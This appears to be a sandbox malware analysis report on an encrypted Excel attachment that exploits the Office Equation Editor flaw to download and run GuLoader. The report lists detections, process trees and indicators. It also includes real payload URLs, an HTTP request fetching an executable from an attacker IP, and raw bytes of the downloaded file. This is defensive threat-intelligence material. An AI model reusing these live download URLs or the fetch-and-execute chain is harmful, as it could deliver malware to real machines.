Loading ...

Play interactive tourEdit tour

Analysis Report BL_SGN11203184.xlsx

Overview

General Information

Sample Name:BL_SGN11203184.xlsx
Analysis ID:432590
MD5:06eb9a2b3d7113604968b87722ed242a
SHA1:2a6929b76b8b69a4e3a3766881280c63af765cb1
SHA256:1554d0f1b36381c9a323749cd62b7870c8273d8020fc81df09cb159a3bb84acc
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1920 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2396 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2824 cmdline: 'C:\Users\Public\vbc.exe' MD5: 99BBF83ABE9D6E4ECC91493E32230833)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\Public\vbc.exeJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000004.00000000.2151758048.0000000000401000.00000020.00020000.sdmpJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
          00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmpJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              4.2.vbc.exe.400000.1.unpackJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security
                4.0.vbc.exe.400000.0.unpackJoeSecurity_GuLoader_1Yara detected GuLoaderJoe Security

                  Sigma Overview

                  Exploits:

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.155.82.236, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2396, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                  Sigma detected: File Dropped By EQNEDT32EXEShow sources
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2396, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe

                  System Summary:

                  barindex
                  Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2396, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
                  Sigma detected: Execution from Suspicious FolderShow sources
                  Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2396, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for URL or domainShow sources
                  Source: http://103.155.82.236/fksdoc/svchost.exeAvira URL Cloud: Label: malware
                  Found malware configurationShow sources
                  Source: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co"}
                  Multi AV Scanner detection for domain / URLShow sources
                  Source: http://103.155.82.236/fksdoc/svchost.exeVirustotal: Detection: 12%Perma Link
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeMetadefender: Detection: 28%Perma Link
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeReversingLabs: Detection: 58%
                  Source: C:\Users\Public\vbc.exeMetadefender: Detection: 28%Perma Link
                  Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 58%
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: BL_SGN11203184.xlsxReversingLabs: Detection: 21%

                  Exploits:

                  barindex
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: excel.exeMemory has grown: Private usage: 4MB later: 46MB
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80
                  Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 103.155.82.236:80
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: https://www.pos.nblwarehouse.my.id/bin_GgrWeMMq137.bin, http://benvenuti.rs/wp-co
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Jun 2021 13:17:37 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 07:07:06 GMTETag: "24000-5c44fec1ebc1c"Accept-Ranges: bytesContent-Length: 147456Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 b2 bb 47 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 10 02 00 00 30 00 00 00 00 00 00 10 1c 00 00 00 10 00 00 00 20 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 30 8e 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 0f 02 00 28 00 00 00 00 40 02 00 50 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 05 02 00 00 10 00 00 00 10 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 50 12 00 00 00 20 02 00 00 10 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 09 00 00 00 40 02 00 00 10 00 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
                  Source: global trafficHTTP traffic detected: GET /fksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.82.236Connection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 103.155.82.236
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77229A3.emfJump to behavior
                  Source: global trafficHTTP traffic detected: GET /fksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.82.236Connection: Keep-Alive
                  Source: F77229A3.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0

                  System Summary:

                  barindex
                  Office equation editor drops PE fileShow sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
                  Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446A2E NtAllocateVirtualMemory,
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446A78 NtAllocateVirtualMemory,
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446C20 NtAllocateVirtualMemory,
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446AF8 NtAllocateVirtualMemory,
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446B94 NtAllocateVirtualMemory,
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00401C10
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004055F3
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446A2E
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00444440
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044185A
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044666C
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446A78
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044B409
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044341C
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446629
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00443834
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00443A30
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00443238
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004434C0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004436DE
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00446AF8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00444490
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004432A0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00443AA0
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004466B8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044350C
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044450C
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00443714
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044331C
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00443925
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00443B30
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0044173C
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004439DC
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004431D8
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004447ED
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004443FB
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00443788
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00444993
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004433A4
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004417B8
                  Source: BL_SGN11203184.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: svchost[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/16@0/1
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$BL_SGN11203184.xlsxJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF085.tmpJump to behavior
                  Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: BL_SGN11203184.xlsxReversingLabs: Detection: 21%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                  Source: BL_SGN11203184.xlsxStatic file information: File size 1317888 > 1048576
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: BL_SGN11203184.xlsxInitial sample: OLE indicators vbamacros = False
                  Source: BL_SGN11203184.xlsxInitial sample: OLE indicators encrypted = True

                  Data Obfuscation:

                  barindex
                  Yara detected GuLoaderShow sources
                  Source: Yara matchFile source: 00000004.00000002.2364907663.0000000000440000.00000040.00000001.sdmp, type: MEMORY
                  Yara detected GuLoaderShow sources
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000004.00000000.2151758048.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2364880980.0000000000401000.00000020.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\Public\vbc.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, type: DROPPED
                  Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00409C54 push es; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0040605F push 00000059h; retf
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00406E64 push eax; retf
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_0040A065 pushad ; retf
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00409E0D push edx; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00409EF8 push ss; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00406AFE push es; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_004079CA push cs; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00409387 push ss; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00408D90 push cs; iretd
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00403191 push dword ptr [ebp-44h]; ret
                  Source: C:\Users\Public\vbc.exeCode function: 4_2_00445356 push edi; iretd
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Drops PE files to the user root directoryShow sources
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: BL_SGN11203184.xlsxStream path 'EncryptedPackage' entropy: 7.99983573817 (max. 8.0)

                  Malware Analysis System Evasion:

                  barindex
                  Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
